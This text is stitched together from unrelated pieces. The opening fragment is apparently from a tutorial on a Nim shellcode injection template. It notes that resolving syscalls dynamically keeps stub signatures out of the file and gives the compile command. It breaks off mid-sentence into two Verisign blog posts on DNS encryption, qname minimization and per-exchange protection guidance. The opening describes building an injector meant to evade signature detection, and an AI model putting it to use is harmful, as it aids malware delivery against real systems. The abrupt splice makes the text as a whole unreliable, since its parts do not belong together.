The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:

Information Protection for the Domain Name System: Encryption and Minimization

This is the final in a multi-part series on cryptography and the Domain Name System (DNS).

In previous posts in this series, I’ve discussed a number of applications of cryptography to the DNS, many of them related to the Domain Name System Security Extensions (DNSSEC).

In this final blog post, I’ll turn attention to another application that may appear at first to be the most natural, though as it turns out, may not always be the most necessary: DNS encryption. (I’ve also written about DNS encryption as well as minimization in a separate post on DNS information protection.)

DNS Encryption

In 2014, the Internet Engineering Task Force (IETF) chartered the DNS PRIVate Exchange (dprive) working group to start work on encrypting DNS queries and responses exchanged between clients and resolvers.

That work resulted in RFC 7858, published in 2016, which describes how to run the DNS protocol over the Transport Layer Security (TLS) protocol, also known as DNS over TLS, or DoT.

DNS encryption between clients and resolvers has since gained further momentum, with multiple browsers and resolvers supporting DNS over Hypertext Transport Protocol Security (HTTPS), or DoH, with the formation of the Encrypted DNS Deployment Initiative, and with further enhancements such as oblivious DoH.

The dprive working group turned its attention to the resolver-to-authoritative exchange during its rechartering in 2018. And in October of last year, ICANN’s Office of the CTO published its strategy recommendations for the ICANN-managed Root Server (IMRS, i.e., the L-Root Server), an effort motivated in part by concern about potential “confidentiality attacks” on the resolver-to-root connection.

From a cryptographer’s perspective the prospect of adding encryption to the DNS protocol is naturally quite interesting. But this perspective isn’t the only one that matters, as I’ve observed numerous times in previous posts.

Balancing Cryptographic and Operational Considerations

A common theme in this series on cryptography and the DNS has been the question of whether the benefits of a technology are sufficient to justify its cost and complexity.

This question came up not only in my review of two newer cryptographic advances, but also in my remarks on the motivation for two established tools for providing evidence that a domain name doesn’t exist.

Recall that the two tools — the Next Secure (NSEC) and Next Secure 3 (NSEC3) records — were developed because a simpler approach didn’t have an acceptable risk / benefit tradeoff. In the simpler approach, to provide a relying party assurance that a domain name doesn’t exist, a name server would return a response, signed with its private key, “<name> doesn’t exist.”

From a cryptographic perspective, the simpler approach would meet its goal: a relying party could then validate the response with the corresponding public key. However, the approach would introduce new operational risks, because the name server would now have to perform online cryptographic operations.

The name server would not only have to protect its private key from compromise, but would also have to protect the cryptographic operations from overuse by attackers. That could open another avenue for denial-of-service attacks that could prevent the name server from responding to legitimate requests.

The designers of DNSSEC mitigated these operational risks by developing NSEC and NSEC3, which gave the option of moving the private key and the cryptographic operations offline, into the name server’s provisioning system. Cryptography and operations were balanced by this better solution. The theme is now returning to view through the recent efforts around DNS encryption.

Like the simpler initial approach for authentication, DNS encryption may meet its goal from a cryptographic perspective. But the operational perspective is important as well. As designers again consider where and how to deploy private keys and cryptographic operations across the DNS ecosystem, alternatives with a better balance are a desirable goal.

Minimization Techniques

In addition to encryption, there has been research into other, possibly lower-risk alternatives that can be used in place of or in addition to encryption at various levels of the DNS.

We call these techniques collectively minimization techniques.

Qname Minimization

In “textbook” DNS resolution, a resolver sends the same full domain name to a root server, a top-level domain (TLD) server, a second-level domain (SLD) server, and any other server in the chain of referrals, until it ultimately receives an authoritative answer to a DNS query.

This is the way that DNS resolution has been practiced for decades, and it’s also one of the reasons for the recent interest in protecting information on the resolver-to-authoritative exchange: The full domain name is more information than all but the last name server needs to know.

One such minimization technique, known as qname minimization, was identified by Verisign researchers in 2011 and documented in RFC 7816 in 2016. (In 2015, Verisign announced a royalty-free license to its qname minimization patents.)

With qname minimization, instead of sending the full domain name to each name server, the resolver sends only as much as the name server needs either to answer the query or to refer the resolver to a name server at the next level. This follows the principle of minimum disclosure: the resolver sends only as much information as the name server needs to “do its job.” As Matt Thomas described in his recent blog post on the topic, nearly half of all .com and .net queries received by Verisign’s .com TLD servers were in a minimized form as of August 2020.

Additional Minimization Techniques

Other techniques that are part of this new chapter in DNS protocol evolution include NXDOMAIN cut processing [RFC 8020] and aggressive DNSSEC caching [RFC 8198]. Both leverage information present in the DNS to reduce the amount and sensitivity of DNS information exchanged with authoritative name servers. In aggressive DNSSEC caching, for example, the resolver analyzes NSEC and NSEC3 range proofs obtained in response to previous queries to determine on its own whether a domain name doesn’t exist. This means that the resolver doesn’t always have to ask the authoritative server system about a domain name it hasn’t seen before.

All of these techniques, as well as additional minimization alternatives I haven’t mentioned, have one important common characteristic: they only change how the resolver operates during the resolver-authoritative exchange. They have no impact on the authoritative name server or on other parties during the exchange itself. They thereby mitigate disclosure risk while also minimizing operational risk.

The resolver’s exchanges with authoritative name servers, prior to minimization, were already relatively less sensitive because they represented aggregate interests of the resolver’s many clients1. Minimization techniques lower the sensitivity even further at the root and TLD levels: the resolver sends only its aggregate interests in TLDs to root servers, and only its interests in SLDs to TLD servers. The resolver still sends the aggregate interests in full domain names at the SLD level and below2, and may also include certain client-related information at these levels, such as the client-subnet extension. The lower levels therefore may have different protection objectives than the upper levels.


Minimization techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.

These tools complement those I’ve described in previous posts in this series. Some have already been deployed at scale, such as a DNSSEC with its NSEC and NSEC3 non-existence proofs. Others are at various earlier stages, like NSEC5 and tokenized queries, and still others contemplate “post-quantum” scenarios and how to address them. (And there are yet other tools that I haven’t covered in this series, such as authenticated resolution and adaptive resolution.)

Modern cryptography is just about as old as the DNS. Both have matured since their introduction in the late 1970s and early 1980s respectively. Both bring fundamental capabilities to our connected world. Both continue to evolve to support new applications and to meet new security objectives. While they’ve often moved forward separately, as this blog series has shown, there are also opportunities for them to advance together. I look forward to sharing more insights from Verisign’s research in future blog posts.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

1. This argument obviously holds more weight for large resolvers than for small ones — and doesn’t apply for the less common case of individual clients running their own resolvers. However, small resolvers and individual clients seeking additional protection retain the option of sending sensitive queries through a large, trusted resolver, or through a privacy-enhancing proxy. The focus in our discussion is primarily on large resolvers.

2. In namespaces where domain names are registered at the SLD level, i.e., under an effective TLD, the statements in this note about “root and TLD” and “SLD level and below” should be “root through effective TLD” and “below effective TLD level.” For simplicity, I’ve placed the “zone cut” between TLD and SLD in this note.

Minimization et al. techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.

The post Information Protection for the Domain Name System: Encryption and Minimization appeared first on Verisign Blog.

A Balanced DNS Information Protection Strategy: Minimize at Root and TLD, Encrypt When Needed Elsewhere

Lock image and DNS

Over the past several years, questions about how to protect information exchanged in the Domain Name System (DNS) have come to the forefront.

One of these questions was posed first to DNS resolver operators in the middle of the last decade, and is now being brought to authoritative name server operators: “to encrypt or not to encrypt?” It’s a question that Verisign has been considering for some time as part of our commitment to security, stability and resiliency of our DNS operations and the surrounding DNS ecosystem.

Because authoritative name servers operate at different levels of the DNS hierarchy, the answer is not a simple “yes” or “no.” As I will discuss in the sections that follow, different information protection techniques fit the different levels, based on a balance between cryptographic and operational considerations.

How to Protect, Not Whether to Encrypt

Rather than asking whether to deploy encryption for a particular exchange, we believe it is more important to ask how best to address the information protection objectives for that exchange — whether by encryption, alternative techniques or some combination thereof.

Information protection must balance three objectives:

  • Confidentiality: protecting information from disclosure;
  • Integrity: protecting information from modification; and
  • Availability: protecting information from disruption.

The importance of balancing these objectives is well-illustrated in the case of encryption. Encryption can improve confidentiality and integrity by making it harder for an adversary to view or change data, but encryption can also impair availability, by making it easier for an adversary to cause other participants to expend unnecessary resources. This is especially the case in DNS encryption protocols where the resource burden for setting up an encrypted session rests primarily on the server, not the client.

The Internet-Draft “Authoritative DNS-Over-TLS Operational Considerations,” co-authored by Verisign, expands on this point:

Initial deployments of [Authoritative DNS over TLS] may offer an immediate expansion of the attack surface (additional port, transport protocol, and computationally expensive crypto operations for an attacker to exploit) while, in some cases, providing limited protection to end users.

Complexity is also a concern because DNS encryption requires changes on both sides of an exchange. The long-installed base of DNS implementations, as Bert Hubert has parabolically observed, can only sustain so many more changes before one becomes the “straw that breaks the back” of the DNS camel.

The flowchart in Figure 1 describes a two-stage process for factoring in operational risk when determining how to mitigate the risk of disclosure of sensitive information in a DNS exchange. The process involves two questions.

Figure 1  Two-stage process for factoring in operational risk when determining how to address information protection objectives for a DNS exchange.
Figure 1 Two-stage process for factoring in operational risk when determining how to address information protection objectives for a DNS exchange.

This process can readily be applied to develop guidance for each exchange in the DNS resolution ecosystem.

Applying Guidance

Three main exchanges in the DNS resolution ecosystem are considered here, as shown in Figure 2: resolver-to-authoritative at the root and TLD level; resolver-to-authoritative below these levels; and client-to-resolver.

Figure 2 Three DNS resolution exchanges: (1) resolver-to-authoritative at the root and TLD levels; (2) resolver-to-authoritative at the SLD level (and below); (3) client-to-resolver. Different information protection guidance applies for each exchange. The exchanges are shown with qname minimization implemented at the root and TLD levels.

1. Resolver-to-Root and Resolver-to-TLD

The resolver-to-authoritative exchange at the root level enables DNS resolution for all underlying domain names; the exchange at the TLD level does the same for all names under a TLD. These exchanges provide global navigation for all names, benefiting all resolvers and therefore all clients, and making the availability objective paramount.

As a resolver generally services many clients, information exchanged at these levels represents aggregate interests in domain names, not the direct interests of specific clients. The sensitivity of this aggregated information is therefore relatively low to start with, as it does not contain client-specific details beyond the queried names and record types. However, the full domain name of interest to a client has conventionally been sent to servers at the root and TLD levels, even though this is more information than they need to know to refer the resolver to authoritative name servers at lower levels of the DNS hierarchy. The additional detail in the full domain name may be considered sensitive in some cases. Therefore, this data exchange merits consideration for protection.

The decision flow (as generally described in Figure 1) for this exchange is as follows:

  1. Are there alternatives with lower operational risk that can mitigate the disclosure risk? Yes. Techniques such as qname minimization, NXDOMAIN cut processing and aggressive DNSSEC caching — which we collectively refer to as minimization techniques — can reduce the information exchanged to just the resolver’s aggregate interests in TLDs and SLDs, removing the further detail of the full domain names and meeting the principle of minimum disclosure.
  2. Does the benefit of encryption in mitigating any residual disclosure risk justify its operational risk? No. The information exchanged is just the resolver’s aggregate interests in TLDs and SLDs after minimization techniques are applied, and any further protection offered by encryption wouldn’t justify the operational risk of a protocol change affecting both sides of the exchange. While some resolvers and name servers may be open to the operational risk, it shouldn’t be required of others.

Interestingly, while minimization itself is sufficient to address the disclosure risk at the root and TLD levels, encryption alone isn’t. Encryption protects against disclosure to outside observers but not against disclosure to (or by) the name server itself. Even though the sensitivity of the information is relatively low for reasons noted above, without minimization, it’s still more than the name server needs to know.

Summary: Resolvers should apply minimization techniques at the root and TLD levels. Resolvers and root and TLD servers should not be required to implement DNS encryption on these exchanges.

Note that at this time, Verisign has no plans to implement DNS encryption at the root or TLD servers that the company operates. Given the availability of qname minimization, which we are encouraging resolver operators to implement, and other minimization techniques, we do not currently see DNS encryption at these levels as offering an appropriate risk / benefit tradeoff.

2. Resolver-to-SLD and Below

The resolver-to-authoritative exchanges at the SLD level and below enable DNS resolution within specific namespaces. These exchanges provide local optimization, benefiting all resolvers and all clients interacting with the included namespaces.

The information exchanged at these levels also represents the resolver’s aggregate interests, but in some cases, it may also include client-related information such as the client’s subnet. The full domain names and the client-related information, if any, are the most sensitive parts.

The decision flow for this exchange is as follows:

  1. Are there alternatives with lower operational risk that can mitigate the disclosure risk? Partially. Minimization techniques may apply to some exchanges at the SLD level and below if the full domain names have more than three labels. However, they don’t help as much with the lowest-level authoritative name server involved, because that name server needs the full domain name.
  2. Does the benefit of encryption in mitigating any residual disclosure risk justify its operational risk? In some cases. If the exchange includes client-specific information, then the risk may be justified. If full domain names include labels beyond the TLD and SLD that are considered more sensitive, this might be another justification. Otherwise, the benefit of encryption generally wouldn’t justify the operational risk, and for this reason, as in the previous case, encryption shouldn’t be required, except in the specific purposes noted.

Summary: Resolvers and SLD servers (and below) should implement DNS encryption on their exchanges if they are sending sensitive full domain names or client-specific information. Otherwise, they should not be required to implement DNS encryption.

3. Client-to-Resolver

The client-to-resolver exchange enables navigation to all domain names for all clients of the resolver.

The information exchanged here represents the interests of each specific client. The sensitivity of this information is therefore relatively high, making confidentiality vital.

The decision process in this case traverses the first and second steps:

  1. Are there alternatives with lower operational risk that can mitigate the disclosure risk? Not really. Minimization techniques don’t apply here because the resolver needs the full domain name and the client-specific information included in the request, namely the client’s IP address. Other alternatives, such as oblivious DNS, have been proposed, but are more complex and arguably increase operational risk. Note that some clients use security and confidentiality solutions at different layers of the protocol stack (e.g. a virtual private network (VPN), etc.) to protect DNS exchanges.
  2. Does the benefit of encryption in mitigating any residual disclosure risk justify its operational risk? Yes.

Summary: Clients and resolvers should implement DNS encryption on this exchange, unless the exchange is otherwise adequately protected, for instance as part of the network connection provided by an enterprise or internet service provider.

Summary of Guidance

The following table summarizes the guidance for how to protect the various exchanges in the DNS resolution ecosystem.

In short, the guidance is “minimize at root and TLD, encrypt when needed elsewhere.”

DNS Exchange Purpose Guidance
Resolver-to-Root and TLD Global navigational availability • Resolvers should apply minimization techniques
• Resolvers and root and TLD servers should not be required to implement DNS encryption on these exchanges
Resolver-to-SLD and Below Local performance optimization • Resolvers and SLD servers (and below) should implement DNS encryption on their exchanges if they are sending sensitive full domain names, or client-specific information
• Resolvers and SLD servers (and below) should not be required to implement DNS encryption otherwise
Client-to-Resolver General DNS resolution • Clients and resolvers should implement DNS encryption on this exchange, unless adequate protection is otherwise provided, e.g., as part of a network connection


If the guidance suggested here were followed, we could expect to see more deployment of minimization techniques on resolver-to-authoritative exchanges at the root and TLD levels; more deployment of DNS encryption, when needed, at the SLD levels and lower; and more deployment of DNS encryption on client-to-resolver exchanges.

In all these deployments, the DNS will serve the same purpose as it already does in today’s unencrypted exchanges: enabling general-purpose navigation to information and resources on the internet.

DNS encryption also brings two new capabilities that make it possible for the DNS to serve two new purposes. Both are based on concepts developed in Verisign’s research program.

  1. The client can authenticate itself to a resolver or name server that supports DNS encryption, and the resolver or name server can limit its DNS responses based on client identity. This capability enables a new set of security controls for restricting access to network resources and information. We call this approach authenticated resolution.
  2. The client can confidentially send client-related information to the resolver or name server, and the resolver or name server can optimize its DNS responses based on client characteristics. This capability enables a new set of performance features for speeding access to those same resources and information. We call this approach adaptive resolution.

You can read more about these two applications in my recent blog post on this topic, Authenticated Resolution and Adaptive Resolution: Security and Navigational Enhancements to the Domain Name System.

Verisign CTO Burt Kaliski explains why minimization techniques at the root and TLD levels of the DNS are a key component of a balanced DNS information protection strategy.

The post A Balanced DNS Information Protection Strategy: Minimize at Root and TLD, Encrypt When Needed Elsewhere appeared first on Verisign Blog.
